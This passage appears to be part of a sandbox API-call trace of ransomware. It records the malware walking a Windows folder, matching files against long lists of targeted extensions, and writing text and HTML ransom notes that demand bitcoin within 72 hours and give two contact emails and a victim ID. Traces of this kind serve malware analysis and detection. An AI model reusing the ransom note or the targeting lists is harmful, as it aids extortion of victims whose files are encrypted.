.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0175.678] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0175.678] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0175.678] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0175.678] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\"
	[0175.678] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml"
	[0175.678] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0175.678] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.678] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0175.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.679] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.679] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"
	[0175.679] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml") returned 109
	[0175.679] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.680] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0175.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.680] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0175.680] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0175.680] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 1
	[0175.680] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 0
	[0175.681] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime"
	[0175.681] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*"
	[0175.681] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.681] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.681] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0175.681] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.696] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.696] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.700] CloseHandle (hObject=0x39c) returned 1
	[0175.700] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.701] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0175.702] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.702] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.703] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.703] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.703] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0175.703] CloseHandle (hObject=0x39c) returned 1
	[0175.703] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.704] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.704] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.704] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0175.704] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.706] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.706] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0175.709] CloseHandle (hObject=0x39c) returned 1
	[0175.709] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.710] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.710] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0175.712] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.712] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.712] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.712] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.712] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0175.713] CloseHandle (hObject=0x39c) returned 1
	[0175.713] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x824229fa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName=".", cAlternateFileName="")) returned 0xfb90f0
	[0175.824] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*") returned 97
	[0175.824] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
